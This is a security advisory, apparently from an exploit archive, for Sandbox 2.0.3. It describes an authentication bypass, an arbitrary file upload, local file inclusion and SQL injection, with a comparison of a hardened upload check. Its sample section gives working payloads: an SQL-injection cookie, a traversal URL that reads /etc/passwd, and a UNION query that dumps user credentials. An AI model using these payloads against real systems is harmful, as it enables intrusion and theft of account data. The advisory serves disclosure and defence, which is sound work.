Sandbox 2.0.3 Bypass / Local File Inclusion / Shell Upload / SQL Injection

Sandbox 2.0.3 Bypass / Local File Inclusion / Shell Upload / SQL Injection
Posted Jul 7, 2010
Authored by Salvatore Fresta

Sandbox version 2.0.3 suffers from bypass, local file inclusion, shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, local, vulnerability, sql injection, file inclusion
SHA-256 | 78e1b310611c60f957726764ec989af46f7ebb6e8fbf676a4a1023c0d8c6f4c5

Sandbox 2.0.3 Multiple Remote Vulnerabilities

Name Sandbox
Vendor http://www.iguanadons.net
Versions Affected 2.0.3

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-07

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX


I. ABOUT THE APPLICATION
________________________

Sandbox is a personal website package that provides you
with a blog, image gallery, file downloads area, and the
ability to create miscellaneous custom webpages.


II. DESCRIPTION
_______________

Some parameters are not sanitised before being used in
SQL queries and in dangerous PHP functions.
The vulnerabilities were found in version 2.0.3. Other
versions may also be affected.


III. ANALYSIS
_____________

Summary:

A) Authentication Bypass
B) Arbitrary File Upload
C) Local File Inclusion
D) SQL Injection


A) Authentication Bypass
________________________

The value of the sandbox_pass cookie is used in global.php
without being properly sanitised before it is placed in a
SQL query. Since this value is what the authentication
system checks, the injection can be used to bypass it.
Successful exploitation requires that "magic_quotes_gpc"
is disabled.


B) Arbitrary File Upload
________________________

When a file is sent to blog.php (and also to profile.php)
an inadequate extension check is performed. The check
splits the file name into substrings delimited by a dot
and tests whether the second substring is present in the
white list. This works for a file with a single
extension, but it fails for a file with a double
extension. The following is the affected code in blog.php:

$fname = $this->files['image_file']['tmp_name'];
$system = explode( '.', $this->files['image_file']['name'] );
$system[1] = strtolower($system[1]);

if ( !preg_match( '/jpg|jpeg|png|gif/', $system[1] ) ) {
    // NO UPLOAD
} else {
    // UPLOAD
}

If the file's name is evil.jpg.php: $system[1] = jpg
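The following is an added example, not code from Sandbox or from the advisory author: it reproduces the blog.php check as a function and places a hardened check beside it, so the two can be compared on constructed file names. The function names and sample names are assumptions.

```php
<?php
// Added example (not Sandbox's own code). vulnerable_extension_ok()
// keeps the behaviour of blog.php: it inspects only the component
// after the FIRST dot, with an unanchored regex.
function vulnerable_extension_ok(string $name): bool {
    $system = explode('.', $name);
    $system[1] = strtolower($system[1] ?? '');
    return (bool) preg_match('/jpg|jpeg|png|gif/', $system[1]);
}

// Hardened check: exact whitelist match on the LAST extension,
// exactly one dot allowed, and (optionally) the content must be
// a real image. $tmpPath is the uploaded temp file, if available.
function hardened_extension_ok(string $name, string $tmpPath = ''): bool {
    $allowed = ['jpg', 'jpeg', 'png', 'gif'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    // Reject "a.b.c" names: some server configurations evaluate
    // every extension, so a single dot keeps the stored name simple.
    if (substr_count($name, '.') !== 1) {
        return false;
    }
    if ($tmpPath !== '' && @getimagesize($tmpPath) === false) {
        return false;
    }
    return true;
}

// Constructed sample names: the middle two are the cases the
// original check gets wrong or would get wrong elsewhere.
$samples = ['photo.jpg', 'evil.jpg.php', 'evil.php.jpg', 'shell.php', 'x.JPG'];
foreach ($samples as $s) {
    printf("%-14s vulnerable=%s hardened=%s\n", $s,
        vulnerable_extension_ok($s) ? 'accept' : 'reject',
        hardened_extension_ok($s) ? 'accept' : 'reject');
}
```

In practice the stored file should also be given a server-generated name rather than the client-supplied one, so the extension check is a filter rather than the only control.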


C) Local File Inclusion
_______________________

The a parameter in admin.php is not properly sanitised
before being used in PHP's require() function.
This can be exploited to include arbitrary files from
local resources via directory traversal attacks and
URL-encoded NULL bytes.


D) SQL Injection
________________

The p parameter in modules/page.php is not properly
sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Authentication Bypass

cookie: sandbox_pass = 1' OR '1'='1'#
cookie: sandbox_user = userid (1 for admin)


B) Arbitrary File Upload

Upload a file with a double extension.


C) Local File Inclusion

http://site/path/admin.php?a=../../../../../../../etc/passwd%00


D) SQL Injection

http://site/path/index.php?a=page&p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users


V. FIX
______

No fix.
